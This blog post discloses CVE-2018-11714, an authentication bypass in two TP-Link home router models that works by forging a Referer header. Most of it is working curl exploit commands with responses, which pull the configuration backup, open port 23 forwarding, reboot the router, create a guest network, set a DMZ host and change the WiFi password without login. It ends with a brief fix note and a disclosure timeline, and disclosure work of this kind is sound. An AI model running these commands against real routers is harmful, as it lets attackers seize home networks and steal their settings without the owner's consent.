Time to Disable TP-Link Home WiFi Router (CVE-2018-11714)

Posted on by Touhid Shaikh

Hello Folks,

We are BlackFog Team, some days before one of our team member found a very interesting bug in TP-Links Wifi Home Routers which gives full permission on a router without login to the router’s admin panel.  In short, we can Bypass the Authentication Mechanism just using a simple trick.

Index

  • Vendor Description
  • Vulnerable Routers and Version
  • Attack Description
  • PoC
  • Explore More  (Authentication Bypass)
  • Fix
  • Timeline

Vendor Description

TP-Link is the world’s #1 provider of consumer WiFi networking devices, shipping products to over 120 countries and hundreds of millions of customers. (source https://www.tp-link.com/)

Vulnerable Routers and Version

Hardware: TL-WR841N v13 00000013
Firmware Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n

Hardware: TL-WR840N v5 00000005
Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n

Attack Description

This issue is caused by improper session handling on /cgi/ Folder or /cgi file, This bug found by Touhid Shaikh. if an attacker sends Referer Header with its request and sets Referer: http://192.168.0.1/mainFrame.htm than its no authentication required and an attacker can do router’s action without authentication. below are some of few examples you can see. But the attacker can do mostly all of the action on a router without Authentication.

NOTE: Except admin’s password change because of its required current password for changing.

PoC

In This PoC our Team try to download router’s Backup file which contains all setting information within BIN extension file format.

Below we show FAIL and the SUCCESSFUL attempt which tried by our team.

—————————————- FAIL ———————————-
root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: close

<html><head><title>403 Forbidden</title></head><body><center><h1>403
Forbidden</h1></center></body></html>

————————————————————————————-

———————————– SUCCESSFUL  —————————-
root@linux:/workspace# curl -i -s -k -X GET -H “Referer: http://192.168.0.1/mainFrame.htm” http://192.168.0.1/cgi/conf.bin
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5984
Connection: keep-alive

root@linux:/workspace# curl -s -k -X GET -H “Referer: http://192.168.0.1/mainFrame.htm”  http://192.168.0.1/cgi/conf.bin > backup.bin
root@linux:/workspace# file backup.bin
backup.bin: data
root@linux:/workspace# ls -la backup.bin
-rw-r–r– 1 root root 5720 Mar 30 17:17 backup.bin
—————————————————————

Explore More (Authentication Bypass)

After successfully download Backup file our team try to do more action on the router. Using above PoC trick,

Below we successfully manage and do some action on a router.

=========== Add Port Forwarding ============

curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:http://192.168.0.1/mainFrame.htm" --data-binary $'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP or UDP\x0d\x0aopenProtocol=TCP or UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0

—– Decription —–
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================

=============== Reboot Router =====================

curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:http://192.168.0.1/mainFrame.htm" --data-binary $'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[error]0

—-Description —–
error = 0 means reboot seccessully
======================================

============= Enable Guest Network =====================

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H $'Connection: close' --data-binary $'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' $'http://192.168.0.1/cgi?2&2&2&2&2'

——- Description ———-
SSID=Agent22
PreSharedKey=9876543210
=============================================

======= DMZ enable and Disable on 192.168.0.112 ===========

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 78' -H $'Connection: close' --data-binary $'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a' $'http://192.168.0.1/cgi?2'

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close

[error]0

——-Description ———–
IPAddress=192.168.0.112
enable=1 or 0 (enable or disable)
=================================================

=============== WiFi Password Change =============

curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 199' -H $'Connection: close' --data-binary $'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' $'http://192.168.0.1/cgi?2'

——-Description ———–
IEEE11iAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
X_TP_PreSharedKey=9876543210
===============================

Fix

Update most latest Firmware today. 😉

Timeline

30 Mar, 2018 —– Initial Report (support.in@tp-link.com) (No Response)
27 May, 2018 —– Full Disclosure (Exploit-DB)

 

Don’t use our PoC for Evil activity. we are not responsible for any Damage and we are not support any malicious  activity.

Thank you for reading.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.